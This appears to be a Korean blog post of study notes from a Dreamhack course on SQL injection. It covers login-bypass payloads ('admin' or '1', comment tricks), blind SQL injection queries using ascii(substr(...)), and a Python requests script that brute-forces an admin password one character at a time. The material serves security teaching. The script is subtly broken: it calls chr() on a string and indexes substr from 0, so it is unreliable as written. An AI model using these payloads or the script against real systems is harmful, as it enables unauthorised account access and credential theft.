[Dreamhack] ServerSide: SQL Injection

ServerSide: SQL Injection

---

# 들어가며 - 서론

- DBMS에서 관리하는 데이터베이스에는 회원 계정, 비밀글과 같이 민감한 정보가 포함되어 있을 수 있음

- 공격자는 데이터베이스 파일 탈취, SQL Injection 공격 등으로 해당 정보를 확보하고 악용하여 금전적인 이익을 얻을 수 있음

- 따라서 임의 정보 소유자 이외의 이용자에게 해당 정보가 노출되지 않도록 해야 함

- SQL Injection: DBMS에서 사용하는 쿼리를 임의로 조작해 데이터베이스의 정보를 획득하는 기법

- Injection: 주입이라는 의미를 가진 영단어로, 인젝션 공격은 이용자의 입력값이 애플리케이션의 처리 과정에서 구조나 문법적인 데이터로 해석되어 발생하는 취약점을 의미

드림이의 올바른 요청과 인젝션 요청

드림이가 공장에 생산을 요청하는 그림으로, 드림이가 부품 생성 중에 임의의 요청을 보내 제품의 색깔을 지정

 

드림이의 올바르지 않은 요청과 인젝션 요청

드림이가 올바르지 않은 요청을 보내 공장 운영자가 의도하지 않은 행위를 일으키는 것을 확인할 수 있음

이와 같이 사용자가 악의적인 입력값을 주입해 의도하지 않은 행위를 일으키는 것을 인젝션이라고 함

 

 

# SQL Injection

1. SQL Injection

- SQL: DBMS에 데이터를 질의하는 언어

- 웹 서비스는 이용자의 입력을 SQL 구문에 포함해 요청하는 경우가 많음

ex) 로그인 시에 ID/PW 포함, 게시글의 제목과 내용을 SQL 구문에 포함

로그인 기능을 위한 쿼리

- 로그인할 때 어플리케이션이 DBMS에 질의하는 예시 쿼리

/*
아래 쿼리 질의는 다음과 같은 의미를 가지고 있습니다.
- SELECT: 조회 명령어
- *: 테이블의 모든 컬럼 조회
- FROM accounts: accounts 테이블 에서 데이터를 조회할 것이라고 지정
- WHERE user_id='dreamhack' and user_pw='password': user_id 컬럼이 dreamhack이고, user_pw 컬럼이 password인 데이터로 범위 지정
즉, 이를 해석하면 DBMS에 저장된 accounts 테이블에서 이용자의 아이디가 dreamhack이고, 비밀번호가 password인 데이터를 조회
*/
SELECT * FROM accounts WHERE user_id='dreamhack' and user_pw='password'

이용자가 입력한 "dreamhack"과 "password" 문자열을 SQL 구문에 포함하는 것을 확인할 수 있음

이용자가 SQL 구문에 임의 문자열을 삽입하는 행위를 SQL Injection이라고 함

SQL Injection이 발생하면 조작된 쿼리로 인증을 우회하거나, 데이터베이스의 정보를 유출할 수 있음

SQL Injection으로 조작한 쿼리

/*
아래 쿼리 질의는 다음과 같은 의미를 가지고 있습니다.
- SELECT: 조회 명령어
- *: 테이블의 모든 컬럼 조회
- FROM accounts: accounts 테이블 에서 데이터를 조회할 것이라고 지정
- WHERE user_id='admin': user_id 컬럼이 admin인 데이터로 범위 지정
즉, 이를 해석하면 DBMS에 저장된 accounts 테이블에서 이용자의 아이디가 admin인 데이터를 조회
*/
SELECT * FROM accounts WHERE user_id='admin'

user_pw 조건문이 사라진 것을 확인할 수 있음

조작한 쿼리를 통해 질의하면 DBMS는 ID가 admin인 계정의 비밀번호를 비교하지 않고

해당 계정의 정보를 반환하기 때문에 이용자는 admin 계정으로 로그인할 수 있음

 

2. Simple SQL Injection

- 실습 모듈: 아이디와 비밀번호를 입력받고 DBMS에 조회하기 위한 쿼리를 생성 및 실행

- 실습 모듈에서 사용하는 user_table은 다음과 같이 구현되어 있음

- 실습 모듈 목표: 쿼리 질의를 통해 admin 결과를 반환하는 것

- SQL Injection 공격에서 제일 중요한 것은 이용자의 입력값이 SQL 구문으로 해석되도록 해야 함

- 실습 모듈에서 사용하는 쿼리문의 경우, 이용자의 입력값을 문자열로 나타내기 위해 ' 문자를 사용하는 것을 볼 수 있음

- 이용자의 입력값이 SQL 구문으로 해석되기 위해서는 ' 문자를 입력하는 방법이 있음

- uid에 admin' or '1을 입력하고, 비밀번호를 입력하지 않았을 때 생성되는 쿼리문은 다음과 같음

SELECT * FROM user_table WHERE uid='admin' or '1' and upw='';

쿼리문을 두 개의 조건으로 나눠볼 수 있음

첫 번째 조건은 uid가 "admin"인 데이터,

두 번째 조건은 이전의 식이 참(True)이고, upw가 없는 경우

첫 번째 조건은 admin의 결과를 반환하고, 두 번째 조건은 아무런 결과도 반환하지 않음

다시 말해, uid가 "admin"인 데이터를 반환하기 때문에 관리자 계정으로 로그인할 수 있음

- 이외에도 주석 (--, #, /**/)을 사용하는 등 다양한 방법으로 SQL Injection을 시도할 수 있음

SELECT * FROM user_table WHERE uid='admin'-- ' and upw='';

❓ 실습 모듈 해결하기: admin의 upw를 알아내는 공격 쿼리문을 작성해보세요

* A UNION B: A와 B의 합집합이 나옴

 

 

# Blind SQL Injection

1. Blind SQL Injection

- SQL Injection을 통해 의도하지 않은 결과를 반환해 인증을 우회하는 것을 실습함

- 해당 공격은 인증 우회 이외에도 데이터베이스의 데이터를 알아낼 수 있음

  → 이때 사용할 수 있는 공격 기법이 Blind SQL Injection

- 해당 공격 기법은 스무고개 게임과 유사한 방식으로 데이터를 알아낼 수 있음

- 공격자는 이러한 방법으로 데이터베이스의 내용을 알아낼 수 있음

Q1. dreamhack 계정의 비밀번호 첫 번째 글자는 'x'인가요?

A1. 아닙니다

Q2. dreamhack 계정의 비밀번호 첫 번째 글자는 'p'인가요?

A2. 맞습니다(첫 번째 글자 = p)

Q3. dreamhack 계정의 비밀번호 두 번째 글자는 'y'인가요?

A3. 아닙니다

Q4. dreamhack 계정의 비밀번호 두 번째 글자는 'a'인가요?

A4. 맞습니다(두 번째 글자 = a)

- 위와 같은 형태로 DBMS가 답변 가능한 형태로 질문하면서 dreamhack 계정의 비밀번호인 password를 알아낼 수 있음

- Blind SQL Injection: 질의 결과를 이용자가 화면에서 직접 확인하지 못할 때 참/거짓 반환 결과로 데이터를 획득하는 공격 기법

Blind SQL Injection 공격 쿼리

- Blind SQL Injection 공격 시에 사용할 수 있는 쿼리

# 첫 번째 글자 구하기 (아스키 114 = 'r', 115 = 's'')
SELECT * FROM user_table WHERE uid='admin' and ascii(substr(upw,1,1))=114-- ' and upw=''; # False
SELECT * FROM user_table WHERE uid='admin' and ascii(substr(upw,1,1))=115-- ' and upw=''; # True
# 두 번째 글자 구하기 (아스키 115 = 's', 116 = 't')
SELECT * FROM user_table WHERE uid='admin' and ascii(substr(upw,2,1))=115-- ' and upw=''; # False
SELECT * FROM user_table WHERE uid='admin' and ascii(substr(upw,2,1))=116-- ' and upw=''; # True

세 개의 조건이 있는 것을 확인할 수 있음

공격 쿼리문의 두 번째 조건을 살펴보면, upw의 첫 번째 값을 아스키 형태로 변환한 값이

114('r') 또는 115('s')인지 질의

질의 결과는 로그인 성공 여부로 참/거짓을 판단할 수 있음

만약 로그인이 실패할 경우 첫 번째 문자가 'r'이 아님을 의미

쿼리문의 반환 결과를 통해 admin 계정의 비밀번호를 획득할 수 있음

 

* ascii: 전달된 문자를 아스키 형태로 반환하는 함수

* substr: 문자열에서 지정한 위치부터 길이까지의 값을 가져옴

substr(string, position, length)
substr('ABCD', 1, 1) = 'A'
substr('ABCD', 2, 2) = 'BC'

 

2. Blind SQL Injection 공격 스크립트

- Blind SQL Injection: 한 바이트씩 비교하여 공격하는 방식이기 때문에 다른 공격에 비해 많은 시간을 들여야 함

- 위와 같은 문제를 해결하기 위해서는 공격을 자동화하는 스크립트를 작성하는 방법이 있음

- 공격 스크립트를 작성하기에 유용한 라이브러리 → request 모듈

  > 해당 모듈은 다양한 메소드를 사용해 HTTP 요청을 보낼 수 있으며 응답 또한 확인할 수 있음

requests 모듈 GET 예제 코드

- requests 모듈을 통해 HTTP의 GET 메소드 통신을 하는 예제 코드

import requests
url = 'https://dreamhack.io/'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'DREAMHACK_REQUEST'
}
params = {
    'test': 1,
}
for i in range(1, 5):
    c = requests.get(url + str(i), headers=headers, params=params)
    print(c.request.url)
    print(c.text)

requests.get은 GET 메소드를 사용해 HTTP 요청을 보내는 함수로,

URL과 Header, Parameter와 함께 요청을 전송할 수 있음

requests 모듈 POST 예제 코드

- HTTP의 POST 메소드 통신을 하는 예제 코드

import requests
url = 'https://dreamhack.io/'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'DREAMHACK_REQUEST'
}
data = {
    'test': 1,
}
for i in range(1, 5):
    c = requests.post(url + str(i), headers=headers, data=data)
    print(c.text)

request.post는 POST 메소드를 사용해 HTTP 요청을 보내는 함수로

URL과 Header, Body와 함께 요청을 보낼 수 있음

- GET, POST 메소드 이외에도 다양한 메소드를 사용해 요청을 전송할 수 있으며, 더욱 자세한 기능은 아래 첨부한 공식 문서를 참고할 것

💡 Requests 모듈 공식 문서: https://docs.python-requests.org/en/master/

 

3. Blind SQL Injection 공격 스크립트 작성

- 앞서 다룬 예제에서 Blind SQL Injection을 시도한다고 가정해 봄

- 공격하기에 앞서, 아스키 범위 중 이용자가 입력할 수 있는 모든 문자의 범위를 지정해야 함

ex) 비밀번호의 경우 알파벳과 숫자 그리고 특수 문자로 이뤄짐

→ 이는 아스키 범위로 나타내면 32부터 126까지의 모든 문자

Blind SQL Injection 공격 스크립트

#!/usr/bin/python3
import requests
import string
url = 'http://example.com/login' # example URL
params = {
    'uid': '',
    'upw': ''
}
tc = string.ascii_letters + string.digits + string.punctuation # abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~
query = '''
admin' and ascii(substr(upw,{idx},1))={val}--
'''
password = ''
for idx in range(0, 20):
    for ch in tc:
        params['uid'] = query.format(idx=idx, val=ord(ch)).strip("\n")
        c = requests.get(url, params=params)
        print(c.request.url)
        if c.text.find("Login success") != -1:
            password += chr(ch)
            break
print(f"Password is {password}")

비밀번호에 포함될 수 있는 문자를 string 모듈을 사용해 생성하고,

한 바이트씩 모든 문자를 비교하는 반복문을 작성

반복문 실행 중에 반환 결과가 참일 경우에 페이지에 표시되는 "Login success" 문자열을 찾고,

해당 결과를 반환한 문자를 password 변수에 저장

반복문을 마치면 "admin" 계정의 비밀번호를 알아낼 수 있음

실행 결과

 

 

# 마치며

- 키워드

① SQL Injection: SQL 쿼리에 이용자의 입력 값을 삽입해 이용자가 원하는 쿼리를 실행할 수 있는 취약점

② Blind SQL Injection: 데이터베이스 조회 후 결과를 직접적으로 확인할 수 없는 경우 사용할 수 있는 SQL Injection 공격 기법